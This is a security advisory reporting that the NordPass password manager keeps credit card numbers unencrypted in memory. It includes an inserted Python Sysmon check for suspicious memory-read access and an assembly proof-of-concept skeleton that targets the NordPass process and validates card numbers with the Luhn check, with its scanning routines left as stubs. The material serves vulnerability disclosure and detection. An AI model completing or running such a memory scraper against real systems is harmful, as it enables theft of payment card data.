NordPass Password Manager Vulnerability: Unsecured Credit Card Data at Risk

Description

The NordPass password manager is currently experiencing issues related to credit card hashing and memory protection, allowing hackers and POS malware to extract credit card data from its application. Users rely on password managers to safeguard their passwords and credit card data from hackers, especially when their computers are compromised. However, NordPass stores credit card data in plain text format in memory, making it vulnerable to compromise in case of a computer infection.

DATE(S) ISSUED: 01/06/2025

RISK: Critical

Businesses:

Large and medium: HIGH

Home Users: HIGH

Method: Remote thread execution

Download Link:

https://downloads.npass.app/windows/NordPassSetup.exe

Attackers Method:

The memory management issues in NordPass allow attackers to access the NordPass process and search for credit card numbers stored in memory. Password apps are frequently targeted by POS malware like Fin7 POS, which uses memory scrapers. These malicious programs scan memory for sensitive data, such as credit card information, often capturing it when the data is unencrypted and vulnerable. Unfortunately, the NordPass password manager is affected by this vulnerability.

This method closely resembles the widely-known point-of-sale malware called TinyPOS.

Research on TinyPOS can be found here:
https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/
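
A defender-side check for the access pattern described above, added here as an example and not part of the original advisory: a memory scraper has to open the target process with PROCESS_VM_READ, which Sysmon records as Event ID 10 (ProcessAccess). The allowlist, the install path and the sample events are constructed assumptions.

```python
import ntpath

PROCESS_VM_READ = 0x0010  # access right ReadProcessMemory requires on the handle
TARGET_NAME = "nordpass-background-app.exe"  # process name from the PoC's .data section
# Assumption: processes expected to read the target's memory; tune per environment.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\lsass.exe"}

def suspicious_accesses(events):
    """Return Sysmon Event ID 10 (ProcessAccess) records in which a
    non-allowlisted process opened the target with PROCESS_VM_READ."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        target = ev.get("TargetImage", "").lower()
        if ntpath.basename(target) != TARGET_NAME:
            continue
        try:
            mask = int(ev.get("GrantedAccess", ""), 16)
        except ValueError:
            continue  # malformed or missing access mask
        source = ev.get("SourceImage", "").lower()
        if not mask & PROCESS_VM_READ or source in ALLOWED_SOURCES or source == target:
            continue
        hits.append(ev)
    return hits

# Constructed sample events (field names follow Sysmon; all paths are placeholders).
NP = r"C:\Program Files\NordPass\Nordpass-background-app.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\Public\updater.exe",
     "TargetImage": NP, "GrantedAccess": "0x1410"},      # unknown reader: alert
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": NP, "GrantedAccess": "0x1FFFFF"},    # allowlisted source
    {"EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": NP, "GrantedAccess": "0x1000"},      # no VM_READ bit
    {"EventID": 1, "SourceImage": r"C:\Users\Public\updater.exe",
     "TargetImage": NP, "GrantedAccess": "0x1410"},      # not a ProcessAccess event
    {"EventID": 10, "SourceImage": r"C:\Users\Public\updater.exe",
     "TargetImage": r"C:\Windows\notepad.exe", "GrantedAccess": "0x1410"},  # other target
]

if __name__ == "__main__":
    for hit in suspicious_accesses(SAMPLE_EVENTS):
        print("ALERT", hit["SourceImage"], "->", hit["TargetImage"], hit["GrantedAccess"])
```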

Please check our proof of concept (POC) below:

.386
.model flat, stdcall
option casemap:none

; Windows API imports
includelib kernel32.lib
includelib psapi.lib

; The @N suffix is the total size in bytes of the stdcall arguments
extern GetSystemInfo@4:near
extern VirtualQueryEx@16:near
extern ReadProcessMemory@20:near
extern EnumProcesses@12:near
extern EnumProcessModules@16:near
extern GetModuleBaseNameA@16:near
extern OpenProcess@12:near
extern CloseHandle@4:near
extern ExitProcess@4:near

.data
targetProcessName db "Nordpass-background-app.exe", 0 ; NordPass target process name
errorMessage db "Error encountered!", 0
validCardMessage db "Valid Luhn card number found: ", 0
processName db "Unknown", 0
buffer db 4096 dup(0) ; Memory buffer for reading process memory

.code

; Function: isLuhnValid
; Arguments: ECX = Address of card number string (16 digits)
; Returns: EAX = 1 if valid, 0 if not
isLuhnValid:
    push ebx
    push esi
    push edi
    xor edi, edi              ; Initialize totalSum (doubled positions) = 0
    xor edx, edx              ; Initialize oddSum (undoubled positions) = 0
    mov esi, 16               ; len = 16
    mov ebx, ecx              ; EBX points to the start of the card number string

process_digits:
    movzx eax, byte ptr [ebx] ; Load the current character, zero-extended
    cmp al, '0'               ; Check if it's less than '0'
    jb invalid_digit
    cmp al, '9'               ; Check if it's greater than '9'
    ja invalid_digit

    sub al, '0'               ; Convert character to digit (EAX = 0..9)

    test esi, 1               ; Odd number of digits remaining?
    jnz odd_position

even_position:
    add eax, eax              ; Double the digit
    cmp eax, 9
    jbe add_doubled
    sub eax, 9                ; Same as summing the two digits of the product
add_doubled:
    add edi, eax              ; Add doubled value to totalSum
    jmp next_digit

odd_position:
    add edx, eax              ; Add to oddSum

next_digit:
    inc ebx
    dec esi
    jnz process_digits        ; Continue until all 16 digits are processed

    lea eax, [edi + edx]      ; EAX = totalSum + oddSum
    xor edx, edx              ; Clear EDX for division
    mov ecx, 10
    div ecx                   ; EDX = sum mod 10
    test edx, edx             ; Check if remainder is 0
    jz valid_card             ; If remainder is 0, valid card
    xor eax, eax              ; Invalid card, return 0
    jmp luhn_done

valid_card:
    mov eax, 1                ; Valid card, return 1
    jmp luhn_done

invalid_digit:
    xor eax, eax              ; Invalid input, return 0

luhn_done:
    pop edi
    pop esi
    pop ebx
    ret

; Function: scanProcessMemoryForCardNumbers
; Arguments:
; EAX = hProcess
; EBX = target process name
scanProcessMemoryForCardNumbers:
    ; Simplified for illustration purposes, not interacting with the full memory API
    ; Normally, you'd interact with the Windows APIs here like VirtualQueryEx, ReadProcessMemory, etc.
    ret

; Function: ListProcessesAndCheckMemory
ListProcessesAndCheckMemory:
    ; Call EnumProcesses to get a list of process IDs
    ; Iterate through the process IDs and check each process
    ; If a process name matches the target process, call scanProcessMemoryForCardNumbers
    ret

; Main Entry Point
_start:
    ; Example target process name
    lea ebx, targetProcessName ; Load target process name into EBX
    call ListProcessesAndCheckMemory

    ; Exit the program (exit code 0)
    push 0
    call ExitProcess@4

end _start

Summary:

The developer has already advised regarding this issue.

Questions?

info@venaksecurity.com
